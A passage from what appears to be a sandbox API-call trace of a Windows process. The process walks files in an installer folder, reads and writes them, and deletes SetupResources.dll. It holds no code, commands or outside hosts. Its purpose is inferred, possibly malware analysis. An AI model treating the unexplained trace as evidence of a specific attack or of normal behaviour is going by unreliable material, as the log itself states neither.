lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0073.169] GetLastError () returned 0x0 [0073.169] SetLastError (dwErrCode=0x0) [0073.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0073.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0073.169] GetLastError () returned 0x0 [0073.169] SetLastError (dwErrCode=0x0) [0073.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0073.169] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x960, lpOverlapped=0x0) returned 1 [0073.170] GetLastError () returned 0x0 [0073.170] SetLastError (dwErrCode=0x0) [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0073.170] GetLastError () returned 0x0 [0073.170] SetLastError (dwErrCode=0x0) [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0073.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0073.170] CloseHandle (hObject=0x410) returned 1 [0073.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.171] CloseHandle (hObject=0x418) returned 1 [0073.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0073.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0073.172] AreFileApisANSI () returned 1 [0073.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0073.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0073.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0073.172] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0073.173] GetFileType (hFile=0x418) returned 0x1 [0073.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0073.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.173] GetLastError () returned 0xb7 [0073.173] SetLastError (dwErrCode=0xb7) [0073.173] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0073.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.174] CloseHandle (hObject=0x418) returned 1 [0073.174] AreFileApisANSI () returned 1 [0073.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0073.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0073.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0073.175] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 1 [0073.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0073.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.176] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.176] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.176] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x583, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧肐\x07̧비聐蟀\x08賂̧")) returned 0 [0073.176] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0073.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0073.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0073.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0073.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.177] AreFileApisANSI () returned 1 [0073.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Client", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Client", lpUsedDefaultChar=0x0) returned 29 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0073.177] AreFileApisANSI () returned 1 [0073.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0073.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53838 [0073.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=29 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client") returned 29 [0073.178] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client" (normalized: "c:\\588bce7c90097ed212\\client"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.178] GetLastError () returned 0x5 [0073.178] GetLastError () returned 0x5 [0073.178] SetLastError (dwErrCode=0x5) [0073.178] GetLastError () returned 0x5 [0073.178] SetLastError (dwErrCode=0x5) [0073.178] GetLastError () returned 0x5 [0073.178] SetLastError (dwErrCode=0x5) [0073.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.178] AreFileApisANSI () returned 1 [0073.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0073.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53838 [0073.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=29 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client") returned 29 [0073.178] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client" (normalized: "c:\\588bce7c90097ed212\\client"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.178] GetLastError () returned 0x5 [0073.178] GetLastError () returned 0x5 [0073.178] SetLastError (dwErrCode=0x5) [0073.178] GetLastError () returned 0x5 [0073.178] SetLastError (dwErrCode=0x5) [0073.178] GetLastError () returned 0x5 [0073.178] SetLastError (dwErrCode=0x5) [0073.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0073.179] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0073.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0073.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0073.179] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78710 [0073.352] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.352] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0073.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0073.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.352] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0073.352] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0073.353] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0073.353] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.353] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.354] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.354] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0073.354] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0073.354] AreFileApisANSI () returned 1 [0073.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 47 [0073.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.354] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.354] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0073.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0073.354] AreFileApisANSI () returned 1 [0073.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0073.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0073.354] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0073.355] GetFileType (hFile=0x420) returned 0x1 [0073.355] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0073.355] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0073.355] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0073.355] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0073.355] CloseHandle (hObject=0x420) returned 1 [0073.356] AreFileApisANSI () returned 1 [0073.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.356] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0073.356] MultiByteToWideChar (in: CodePage=0x0, 